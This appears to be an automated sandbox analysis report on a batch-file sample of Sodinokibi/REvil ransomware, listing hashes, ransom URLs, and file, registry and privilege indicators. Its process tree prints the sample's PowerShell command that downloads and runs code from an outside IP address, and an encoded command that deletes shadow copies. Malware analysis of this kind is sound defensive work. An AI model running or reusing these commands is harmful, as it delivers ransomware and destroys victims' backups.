Analysis
-
max time kernel
135s -
max time network
143s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
b692cd395a2db4aacd53de584ee06ea0.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
b692cd395a2db4aacd53de584ee06ea0.bat
Resource
win10v200430
General
-
Target
b692cd395a2db4aacd53de584ee06ea0.bat
-
Size
215B
-
MD5
7b613efb2eb2240a79c12ff83b16d370
-
SHA1
c74e994acea6c088e0590c14a99ccada44dd7c12
-
SHA256
ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e
-
SHA512
7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024
Malware Config
Extracted
http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0
Extracted
C:\58f8ai-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5BF4A84C842F97B
http://decryptor.cc/B5BF4A84C842F97B
Signatures
-
Drops file in Program Files directory 28 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\SkipEnable.pptm powershell.exe File opened for modification \??\c:\program files\RepairStep.dwfx powershell.exe File opened for modification \??\c:\program files\RequestHide.xhtml powershell.exe File created \??\c:\program files\58f8ai-readme.txt powershell.exe File created \??\c:\program files (x86)\58f8ai-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableSplit.docm powershell.exe File opened for modification \??\c:\program files\SubmitDeny.ps1xml powershell.exe File opened for modification \??\c:\program files\TestOut.vsx powershell.exe File opened for modification \??\c:\program files\AddStep.vstx powershell.exe File opened for modification \??\c:\program files\CompleteSelect.mp4 powershell.exe File opened for modification \??\c:\program files\EnableStep.wmv powershell.exe File opened for modification \??\c:\program files\SelectReceive.jtx powershell.exe File opened for modification \??\c:\program files\ResetSend.gif powershell.exe File opened for modification \??\c:\program files\ResetSet.zip powershell.exe File opened for modification \??\c:\program files\StepMerge.nfo powershell.exe File opened for modification \??\c:\program files\UpdateSearch.MTS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\58f8ai-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupCopy.easmx powershell.exe File opened for modification \??\c:\program files\CompareInstall.jpg powershell.exe File opened for modification \??\c:\program files\ResetUse.odt powershell.exe File opened for modification \??\c:\program files\ShowUnprotect.mov powershell.exe File opened for modification \??\c:\program files\UnregisterWrite.js powershell.exe File opened for modification \??\c:\program files\AddUse.xla powershell.exe File opened for modification \??\c:\program files\UseAssert.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\58f8ai-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertRedo.dxf powershell.exe File opened for modification \??\c:\program files\EnterLimit.mhtml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\58f8ai-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\s9ht8xjik234c.bmp" powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeBackupPrivilege 1556 vssvc.exe Token: SeRestorePrivilege 1556 vssvc.exe Token: SeAuditPrivilege 1556 vssvc.exe Token: SeTakeOwnershipPrivilege 784 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 784 powershell.exe 784 powershell.exe 784 powershell.exe 1884 powershell.exe 1884 powershell.exe -
Blacklisted process makes network request 83 IoCs
Processes:
powershell.exeflow pid process 2 784 powershell.exe 6 784 powershell.exe 8 784 powershell.exe 10 784 powershell.exe 11 784 powershell.exe 13 784 powershell.exe 14 784 powershell.exe 16 784 powershell.exe 18 784 powershell.exe 20 784 powershell.exe 22 784 powershell.exe 23 784 powershell.exe 25 784 powershell.exe 26 784 powershell.exe 28 784 powershell.exe 29 784 powershell.exe 31 784 powershell.exe 33 784 powershell.exe 34 784 powershell.exe 36 784 powershell.exe 38 784 powershell.exe 40 784 powershell.exe 42 784 powershell.exe 44 784 powershell.exe 46 784 powershell.exe 47 784 powershell.exe 50 784 powershell.exe 52 784 powershell.exe 53 784 powershell.exe 55 784 powershell.exe 57 784 powershell.exe 59 784 powershell.exe 60 784 powershell.exe 62 784 powershell.exe 64 784 powershell.exe 66 784 powershell.exe 68 784 powershell.exe 69 784 powershell.exe 71 784 powershell.exe 73 784 powershell.exe 74 784 powershell.exe 77 784 powershell.exe 79 784 powershell.exe 80 784 powershell.exe 82 784 powershell.exe 83 784 powershell.exe 85 784 powershell.exe 86 784 powershell.exe 88 784 powershell.exe 90 784 powershell.exe 91 784 powershell.exe 93 784 powershell.exe 95 784 powershell.exe 97 784 powershell.exe 99 784 powershell.exe 101 784 powershell.exe 102 784 powershell.exe 104 784 powershell.exe 105 784 powershell.exe 107 784 powershell.exe 108 784 powershell.exe 110 784 powershell.exe 111 784 powershell.exe 113 784 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 676 wrote to memory of 784 676 cmd.exe powershell.exe PID 784 wrote to memory of 1884 784 powershell.exe powershell.exe PID 784 wrote to memory of 1884 784 powershell.exe powershell.exe PID 784 wrote to memory of 1884 784 powershell.exe powershell.exe PID 784 wrote to memory of 1884 784 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1884
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1556